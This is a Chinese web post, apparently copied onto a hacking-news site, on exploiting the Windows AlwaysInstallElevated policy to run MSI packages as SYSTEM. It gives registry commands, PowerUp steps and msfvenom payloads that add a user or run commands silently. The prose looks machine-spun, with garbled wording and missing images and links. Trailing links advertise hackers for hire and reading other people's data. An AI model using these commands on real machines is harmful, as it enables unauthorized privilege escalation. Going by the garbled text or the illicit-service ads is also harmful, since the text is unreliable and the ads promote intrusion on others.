利用AlwaysInstallElevated提权的检测剖析

访客4年前黑客资讯457

利用AlwaysInstallElevated提权是一个2017年公布的技术性,Metasploit和PowerUp都出示了利用方式。

我还在科学研究的全过程中,发觉Metasploit的利用方式存有一些不够,我碰到了和别的公布文章内容叙述不一样的状况。

因此我做了进一步的科学研究,文中即将详细介绍我碰到的难题和解决方案。

0x01 介绍

文中即将详细介绍以下几点:

· 基本利用方式

· 我还在检测中碰到的难题

· 解决方案

· 拓展利用构思

0x02 基本利用方式

AlwaysInstallElevated是一个组策略配备,假如开启,那麼将容许单用户以SYSTEM管理权限运作安裝文件(msi)。

开启方式:

必须改动下列2个组策略:

· Computer Configuration\\Administrative Templates\\Windows Components\\Windows Installer

· User Configuration\\Administrative Templates\\Windows Components\\Windows Installer

设成Enabled,如下图:

注:没法根据secedit.exe在命令行下改动之上2个组策略。

命令行下的开启方式:

建立下列2个注册表项:

· HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer,AlwaysInstallElevated,1

· HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer,AlwaysInstallElevated,1

cmd的指令以下:

reg add HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

reg add HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

利用方式:

开启AlwaysInstallElevated后,能够根据命令行启用msiexec安裝msi文件,msi文件内包括要执行的Payload,Payload可能以System管理权限执行。

启用msiexec的指令以下:

msiexec /q /i test.msi

/i主要参数用于表明安装简单。

/q主要参数用于掩藏安裝页面。

注:执行之后在%TEMP%下生成MSI的log文件。

大量有关msiexec的详细介绍可参照以前的文章内容《渗透测试中的msiexec》。

0x03 开源系统方式检测

在接口测试开启AlwaysInstallElevated,指令以下:

reg add HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

reg add HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

1.PowerUp

(1)检测是不是开启AlwaysInstallElevated

Import-Module .\\PowerUp.ps1

Get-RegistryAlwaysInstallElevated

回到True意味着打开。

(2)导出来msi文件

Import-Module .\\PowerUp.ps1

Write-UserAddMSI

当前目录生成UserAdd.msi。

(3)命令行执行(当今用户权限)

msiexec /q /i UserAdd.msi

弹出来加上客户的提示框,可以用于加上客户,如下图:

这时查询该提示框的管理权限为System,如下图:

提权取得成功。

2.Metasploit

生成弹出来计算方式的msi文件,指令以下:

msfvenom -p windows/exec CMD=calc.exe -f msi >calc.msi

命令行执行msi文件(当今用户权限):

msiexec /q /i calc.msi

弹出来的计算方式管理权限为Medium,如下图:

这与PowerUp的結果不一样。

换为别的Payload的msi文件,比如加上客户:

msfvenom -p windows/adduser USER=test PASS=12356QW!@ -f msi >adduser.msi

比如执行cmd指令:

msfvenom -p windows/x64/exec CMD='whoami >1.txt' -f msi > cmd.msi

因为管理权限不足(为Medium),均不成功。

这与别的公布文章内容详细介绍的状况不一样。

本人猜想:

应用Metasploit生成的msi文件在运作时沒有规定提高管理权限,因此造成 了这个问题。

0x04 解决方案

这儿能够参照PowerUp的 *** 生成msi文件。

立即执行PowerUp生成的UserAdd.msi,如下图:

提醒msi文件是由MSI Wrapper生成。

下边大家就试着应用MSI Wrapper生成一个能用的Payload。

下载链接:

生成全过程以下:

1.将Payload设定为执行ProcessHacker

配备如下图:

2.运作时规定提高管理权限

配备如下图:

注:MSI installation context下挑选Per User和Per Machine都能够。

别的配备依照默认,生成的msi文件已提交至github,详细地址以下:

再度检测,命令行执行msi文件(当今用户权限):

msiexec /q /i RunProcessHacker.msi

相关文章

棠梨叶落胭脂色,荞麦花开白雪香。全诗翻译赏析及作者出处

棠梨葉落胭脂色,蕎麥花開白雪香。全詩翻譯賞析及作者出處讀書啊,我信赖但有朗朗書聲出破廬,遲早有一日有萬鯉躍龍門之奇象。 棠梨葉落胭脂色,蕎麥花開白雪香。這句話是什麼意思?出自哪首詩?作者是誰?下面...

告诉你西安土门有史以来最好的洗浴 愉快的一次桑松体验

对你说西安土门迄今为止最好是的浴池开心的一次桑松感受西安浴池高级私人会所大家有技术专业的服务工作人员将确保服务新项目内的品质和時间,西安土门最好是的浴池一心一意出示最好是的服务。会馆服务承诺全部的服务...

新三国郭嘉(三国武将排行)

而且在最近的很多 三国影视作品里,贾诩的主戏渐渐地提升,他也肩负了一个很重要的位置,因而 他也是贾诩积累的一定粉丝。那为什么贾诩才37岁就逝世?贾诩不幸身亡的真正原因是什么?贾诩自小谋定后动,感觉汉未...

如何远程删除手机短信(手机丢了能不能远程删除信息)

如何远程删除手机短信(手机丢了能不能远程删除信息)

本文导读目录: 1、安卓手机支持远程控制消除手机数据吗 2、怎么远程删除别人手机上的数据信息推荐/怎么远程删除 3、用IPHONE远程删除IPAD上显示的信息。 4、我的手机丢了,怎么能把...

接单得黑客,黑客高手联系,黑客宝宝找爹地

这软件还不是太了解。 – - $sql = "SELECT DISTINCT gid FROM ".DB_PREFIX."comment WHERE ip='$ip'";如图所示有两个redis装备...

怎么查询他人QQ已删聊天记录

11月1日上午,一场武汉超燃盛宴——2020年武汉设计日开幕式在位于中建科技产业园(中建·光谷之星)的中国建筑科技馆隆重举行,中建科技产业园(中建·光谷之星)成为首批武汉设计...